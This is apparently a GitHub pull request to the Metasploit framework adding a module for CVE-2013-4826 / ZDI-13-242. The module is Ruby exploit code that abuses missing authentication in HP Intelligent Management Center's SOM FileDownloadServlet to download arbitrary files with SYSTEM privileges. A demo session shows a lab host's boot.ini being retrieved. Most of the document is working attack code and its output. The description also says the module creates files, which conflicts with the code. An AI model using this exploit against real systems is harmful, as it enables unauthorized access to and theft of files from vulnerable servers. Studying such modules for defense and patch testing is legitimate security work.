### PR TITLE
Add module for ZDI-13-242

### DIFF
--- a/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb
+++ b/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb
@@ -63,11 +63,11 @@ class Metasploit3 < Msf::Auxiliary
   def run_host(ip)
 
     unless is_imc_som?
-      vprint_error("#{rhost}:#{rport} - HP iMC with the SOM component not found")
+      vprint_error("#{peer} - HP iMC with the SOM component not found")
       return
     end
 
-    vprint_status("#{rhost}:#{rport} - Sending request...")
+    vprint_status("#{peer} - Sending request...")
     res = send_request_cgi({
       'uri'          => normalize_uri("servicedesk", "servicedesk", "fileDownload"),
       'method'       => 'GET',
@@ -89,9 +89,9 @@ class Metasploit3 < Msf::Auxiliary
         contents,
         fname
       )
-      print_good("#{rhost}:#{rport} - File saved in: #{path}")
+      print_good("#{peer} - File saved in: #{path}")
     else
-      vprint_error("#{rhost}:#{rport} - Failed to retrieve file")
+      vprint_error("#{peer} - Failed to retrieve file")
       return
     end
   end

--- a/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb
+++ b/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb
@@ -1,0 +1,98 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'HP Intelligent Management SOM FileDownloadServlet Arbitrary Download',
+      'Description'    => %q{
+          This module exploits a lack of authentication and access control in HP Intelligent
+        Management, specifically in the FileDownloadServlet from the SOM component, in order to
+        retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully
+        on HP Intelligent Management Center 5.2_E0401 with SOM 5.2 E0401 over Windows 2003 SP2.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2013-4826' ],
+          [ 'OSVDB', '98251' ],
+          [ 'BID', '62898' ],
+          [ 'ZDI', '13-242' ]
+        ]
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
+        OptString.new('FILEPATH', [true, 'The path of the file to download', 'c:\\boot.ini'])
+      ], self.class)
+  end
+
+  def is_imc_som?
+    res = send_request_cgi({
+      'uri'      => normalize_uri("servicedesk", "ServiceDesk.jsp"),
+      'method'   => 'GET'
+    })
+
+    if res and res.code == 200 and res.body =~ /servicedesk\/servicedesk/i
+      return true
+    else
+      return false
+    end
+  end
+
+  def my_basename(filename)
+    return ::File.basename(filename.gsub(/\\/, "/"))
+  end
+
+  def run_host(ip)
+
+    unless is_imc_som?
+      vprint_error("#{rhost}:#{rport} - HP iMC with the SOM component not found")
+      return
+    end
+
+    vprint_status("#{rhost}:#{rport} - Sending request...")
+    res = send_request_cgi({
+      'uri'          => normalize_uri("servicedesk", "servicedesk", "fileDownload"),
+      'method'       => 'GET',
+      'vars_get'     =>
+        {
+          'OperType' => '2',
+          'fileName' => Rex::Text.encode_base64(my_basename(datastore['FILEPATH'])),
+          'filePath' => Rex::Text.encode_base64(datastore['FILEPATH'])
+        }
+    })
+
+    if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] =~ /application\/doc/
+      contents = res.body
+      fname = my_basename(datastore['FILEPATH'])
+      path = store_loot(
+        'hp.imc.somfiledownloadservlet',
+        'application/octet-stream',
+        ip,
+        contents,
+        fname
+      )
+      print_good("#{rhost}:#{rport} - File saved in: #{path}")
+    else
+      vprint_error("#{rhost}:#{rport} - Failed to retrieve file")
+      return
+    end
+  end
+end


### PR DESCRIPTION
Tested successfully on HP Intelligent Management Center 5.2 E0401 with SOM 5.2 E0401 over Windows 2003 SP2. The module allows to create arbitrary files, with system, providing the full path (no traversal)

**Verification**
- [ ] Download a vulnerable HP iMC from http://h17007.www1.hp.com/us/en/networking/products/network-management/IMC_ES_Platform/index.aspx#.Umg5-JRASaI
- [ ] Download a vulnerable SOM version from http://h17007.www1.hp.com/us/en/networking/products/network-management/IMC_SOM_Software/#.Umg6CpRASaI
- [ ] Install the things on W2003SP2
- [ ] Use the module as showed in the demo, should allow to download anything from the remote.

**DEMO**

```
msf auxiliary(hp_imc_som_file_download) > set rhosts 192.168.172.133
rhosts => 192.168.172.133
msf auxiliary(hp_imc_som_file_download) > run

[+] 192.168.172.133:8080 - File saved in: /Users/juan/.msf4/loot/20131023160754_default_192.168.172.133_hp.imc.somfiledo_573076.ini
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(hp_imc_som_file_download) > cat /Users/juan/.msf4/loot/20131023160754_default_192.168.172.133_hp.imc.somfiledo_573076.ini
[*] exec: cat /Users/juan/.msf4/loot/20131023160754_default_192.168.172.133_hp.imc.somfiledo_573076.ini

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Standard" /noexecute=optout /fastdetect
```
